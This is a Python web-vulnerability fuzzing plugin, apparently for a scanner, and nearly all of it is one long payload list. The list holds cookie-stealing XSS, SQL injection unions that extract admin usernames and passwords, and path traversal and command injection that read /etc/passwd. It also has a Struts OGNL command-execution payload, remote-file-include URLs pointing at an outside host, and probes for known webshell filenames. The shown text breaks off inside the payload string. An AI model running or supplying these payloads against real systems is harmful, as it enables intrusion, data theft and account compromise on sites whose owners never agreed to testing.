#renrensaoFuzz script
#author:w8ay

import urlparse
import time

def assign(service, arg):
    if service == "www":
        h = urlparse.urlparse(arg)
        return True,"%s://%s/"%(h.scheme,h.netloc)

def audit(arg):
    payload = '''%0a%0a<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>.jsp
%20
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2F*~1.*%2Fx.aspx
%2Fooxx*~1.*%2Fx.aspx
%2e/
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
%5c/
&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
&z=\x22><script>alert(document.cookie)</script>&f=
*.*
.%252e/.%252e/.%252e/winnt/boot.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
.DS_Store
.FBCIndex
.bash_history
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
.perf
.svn/entries
/
//
//etc/passwd
/DownloadFile?type=full&file=/index.jsp
/abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
/adduser1.asp
/admin/adduser.asp
/admin/admin_login.php
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/admin/css/common.css
/bank.php?transactions='
/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/md5(333))))/**/order/**/by/**/'1-ask-commentlist.html
/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/consolehelp/console-help.portal?_nfpb=true&_pageLabel=ConsoleHelpSearchPage&searchQuery=\x22><script>alert('DSECRG')</script>
/editsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
/in.php?returnpath=http://www.yxlink.com/nvs_test.txt
/index.php
/index.php/Index/index/name/$%7B@phpinfo()%7D
/index.php/Index/index/name/$%7B@print%20md5(NVS_SERVER_TEST_THINKPHP)%7D
/index.php/module/aciton/param1/$%7B@phpinfo()%7D
/index.php/module/aciton/param1/$%7B@print%20md5(NVS_SERVER_TEST_THINKPHP)%7D
/job.php?job=download&url=\x22aHR0cDovL2ltZy5sdWtpbmcuY2MvcGhwMTY4L215c3FsX2NvbmZpZy5waHA=\x22
/kindeditor/php/file_manager_json.php?path=/
/plus/NVS_TEST.PHP
/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.yxlink.com/nvs_test.txt%EF%BC%9F
0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.yxlink.com/nvs_test.txt?
1.php
11
123flashchat.php?e107path=http://www.yxlink.com/nvs_test.txt
1923Turk-Grup.php
2.php
2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
2011/CompVisualizeBig.asp?id=23%20union%20select%201,888888-1,3,4,5%20from%20admin
22_ultimate/templates/header.php?mainpath=http://www.yxlink.com/nvs_test.txt
2fly_gift.php?pages=content&gameid=16%20and%201=2%20union%20select%201,2,3,4,concat(username,0x4E56535F54455354,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20cdb_members
3.php
4.php
5.php
6.php
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
666%0a%0a<script>alert(\x22asdf\x22);</script>666.jsp
7.php
8.php
80sec.php
9.php
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
<script>alert(111)</script>
?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://www.yxlink.com/nvs_test.txt+-n
?/home/explore/category?sort_type-hot__answer_count-1__day-1__topic_id-55)%20and%201=2%20union%20select%20concat%28(select%20concat(user_name,0x4E56535F544553545F474F,email,0x2D3E,password)%20from%20aws_users%20limit%200,1)%29%23
?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20concat(username,char(0x3d),password,0x7C,md5(333))%20from%20cmstop_member%20where%20userid=1;%23
?m=offer&s=offer_list&id=1004%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
?page=admin/function_list&module_id=11'%20union%20select%201,MD5(0000111010101),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,md5(0000111010101),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/auth_user_md5--
?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,md5(333),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
?question/ajaxsearch/%27%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2Cconcat%28md5%28333%29%2Cchar%280x3d%29%2Cpassword%29%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%20from%20ask_user%23
?search==%00{.exec|cmd.exe%20/c%20echo>D:/test.txt%20310dcbbf4cce62f762a2aaa148d556bd.}
?search==%00{.load|D:\x5Ctest.txt.}
?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28md5(333)%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27
@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
A-Blog/navigation/donation.php?navigation_start=http://www.yxlink.com/nvs_test.txt
A-Blog/navigation/latestnews.php?navigation_start=http://www.yxlink.com/nvs_test.txt?
A-Blog/navigation/links.php?navigation_start=http://www.yxlink.com/nvs_test.txt?
A-Blog/navigation/search.php?navigation_end=http://www.yxlink.com/nvs_test.txt?
A-Blog/sources/myaccount.php?open_box=http://www.yxlink.com/nvs_test.txt?
ACGVnews/header.php?PathNews=http://www.yxlink.com/nvs_test.txt
ADM:GETLOGFILE?PARAMS=<script>alert(\x22hello\x22)</script>
ASPWebPack.php
ASPXspy.php
ATutor/documentation/common/frame_toc.php?section=http://www.yxlink.com/nvs_test.txt
ATutor/documentation/common/search.php?section=http://www.yxlink.com/nvs_test.txt
ATutor/documentation/common/vitals.inc.php?req_lang=http://www.yxlink.com/nvs_test.txt
ATutor/include/classes/module/module.class.php?row[dir_name]=http://www.yxlink.com/nvs_test.txt
ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://www.yxlink.com/nvs_test.txt
AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.yxlink.com/nvs_test.txt?
Admin/
Administration/Includes/configureText.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/contentHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/deleteContent.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/deleteUser.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Administration/Includes/userHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://www.yxlink.com/nvs_test.txt?
Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://www.yxlink.com/nvs_test.txt?
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnalyticalReporting/querywizard/jsp/query.jsp?lang=\x22></script><script>alert(1)</script>
BE_config.php?_PSL[classdir]=http://www.yxlink.com/nvs_test.txt
BPNEWS/bn_smrep1.php?bnrep=http://www.yxlink.com/nvs_test.txt?&
Base/Application.php?pear_dir=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/dcontent/default.css.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/include/startup.inc.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Bcwb_PATH/system/default.css.php?root_path_admin=http://www.yxlink.com/nvs_test.txt
Beautifier/Core.php?BEAUT_PATH=http://www.yxlink.com/nvs_test.txt?
BetaBlockModules//Module/Module.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=http://www.yxlink.com/nvs_test.txt
BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt?admin
BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
CCMUser/logon.asp?lang=en'+union+select+md5(333);select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
CFIDE/administrator/index.cfm
CFIDE/componentutils/cfcexplorer.cfc
CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(222)%3E
CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(3444)%3E
CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E \x5Cr/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
CFIDE/probe.cfm
CMD_REDIRECT?view=advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=demo.com
COM
COM/
CSLH2_path/txt-db-api/util.php?API_HOME_DIR=http://www.yxlink.com/nvs_test.txt?
CSNews.cgi?command=viewnews&database=none
CScgi/LogonProxy.cgi?Ok=<script>alert(2222)</script>
CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert(222)</script>
CVS/Entries
CheckUpload.php?Language=http://www.yxlink.com/nvs_test.txt
CheckUpload.php?Language=http://www.yxlink.com/nvs_test.txt&cmd=ls
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Cnnsc.php
Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://www.yxlink.com/nvs_test.txt?
Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=http://www.yxlink.com/nvs_test.txt?
CoupleDB.php?Parametre=0&DataDirectory=http://www.yxlink.com/nvs_test.txt?
CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
DB4Web/10.10.10.10:100
DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=http://www.yxlink.com/nvs_test.txt
DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]http://www.yxlink.com/nvs_test.txt
DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=http://www.yxlink.com/nvs_test.txt
DON3/applications/frontpage.don3app/frontpage.php?app_path=http://www.yxlink.com/nvs_test.txt?
DarkBlade.php
Darkshell.php
Dir_phNNTP/article-raw.php?file_newsportal=http://www.yxlink.com/nvs_test.txt?
DynaTracker_v151/action.php?base_path=http://www.yxlink.com/nvs_test.txt
DynaTracker_v151/includes_handler.php?base_path=http://www.yxlink.com/nvs_test.txt
Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=http://www.yxlink.com/nvs_test.txt?
Ex/modules/threadstop/threadstop.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
Exophpdesk_PATH/pipe.php?lang_file=http://www.yxlink.com/nvs_test.txt
FCK/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
FCKeditor/editor/dialog/fck_flash.html
FCKeditor/editor/dialog/fck_image.html
FCKeditor/editor/dialog/fck_link.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FirstPost/block.php?Include=http://www.yxlink.com/nvs_test.txt
Flickrclient.php?path_prefix=http://www.yxlink.com/nvs_test.txt
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\x5C\x22Vulnerable\x5C\x22);</script>
FormMail.pl
FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yxlink.com/nvs_test.txt?
FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.yxlink.com/nvs_test.txt?
ForumTopicDetails.php?TopicID=-10%20union%20select%201,userid,md5(333),userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=1
Full_Release/include/body_comm.inc.php?content=http://www.yxlink.com/nvs_test.txt
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
Gallery/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
Government/Resources/program/bbs/reg_upload.asp
Government/Resources/program/logon.asp
Guest/baike/Details.aspx?soure=manager&tittle=1'%0aand%2b(select%2bstr(123.4,8,4))>0--
Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
INSTALL.mysql.txt
INSTALL.pgsql.txt
ISSamples/SQLQHit.asp
ISSamples/sqlqhit.asp
Include/Start.php?inc_path=http://www.yxlink.com/nvs_test.txt
Include/functions_folder.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
Include/functions_hacking.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt&itemID=usershow
Include/functions_message.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
Include/lib.inc.php3?Include=http://www.yxlink.com/nvs_test.txt?
Include/lib.inc.php3?http://www.yxlink.com/nvs_test.txt
Include/variables.php3?Include=http://www.yxlink.com/nvs_test.txt?
JFolder.php
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(5).csp
JUNK(5).xml
JUNK(5)/
JUNK(6).cfm?mode=debug
Jobline/admin.jobline.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
Jsp.php
JspSpy.php
Judge.php
K8big.php
K8diy.php
K8jsp.php
ListRecords.php?lib_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
Login.aspx?APPSecret=%27%20and%20(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(102)%2bCHAR(80)%2bCHAR(87)%2bCHAR(57)%2bCHAR(107)%2bCHAR(77)%2bCHAR(84)%2bCHAR(87))%20FROM%20syscolumns)=1--
Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=http://www.yxlink.com/nvs_test.txt
MAINTAINERS.txt
MOD_forum_fields_parse.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
Mamblog/admin.mamblog.php?cfgfile=http://www.yxlink.com/nvs_test.txt
Mem/dynaform/FileExplorer.htm
Mod_Rewrite_Shop/
MsmMask.exe?mask=/junk334
MyStruts.action?%28%27%5Cu0023_memberAccess[%5C%27allowStaticMethodAccess%5C%27]%27%29%28meh%29=true&%28aaa%29%28%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003d%5Cu0023foo%27%29%28%5Cu0023foo%5Cu003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27%5Cu0023rt.exec%28%22id%22%29%27%29%28%5Cu0023rt%5Cu003d@java.lang.Runtime@getRuntime%28%29%29%29=1
NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(document.cookie);window.open(\x22http://attacker.site.example.com\x22);</SCRIPT>
NULL.printer
NetDetector/middle_help_intro.htm
Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://www.yxlink.com/nvs_test.txt?
News.asp?click=1&shu=20%201%20as%20NewsID,88888888-1%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20admin%20union%20select%20top%202
NuclearBB/tasks/send_queued_emails.php?root_path=http://www.yxlink.com/nvs_test.txt
OpenSiteAdmin/indexFooter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/pages/pageHeader.php?path=http://www.yxlink.com/nvs_test.txt?
OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Filter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Form.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/FormManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/LoginManager.php?path=http://www.yxlink.com/nvs_test.txt%00
Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C
PDG_Cart/shopper.conf
PHP/includes/header.inc.php?root=http://www.yxlink.com/nvs_test.txt?
PHP4cp.php
PHPDJ_v05/dj/djpage.php?page=http://www.yxlink.com/nvs_test.txt
PHPJackal.php
PHPspy.php
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
PaTh/index.php?rootpath=http://www.yxlink.com/nvs_test.txt
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
Path_Script/createurl.php?formurl=http://www.yxlink.com/nvs_test.txt
PhotoCart/adminprint.php?admin_folder=http://www.yxlink.com/nvs_test.txt
Picssolution/install/config.php?path=http://www.yxlink.com/nvs_test.txt
Plus/gg/js/ad_dialog.js
Program%20Files/
README
READ_THIS_FIRST.txt
RGboard/include/footer.php?_path[counter]=http://www.yxlink.com/nvs_test.txt?
ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
Russian.php
SPHERA/login/sm_login_screen.php?error=\x5C\x22><script>alert('Vulnerable')</script>
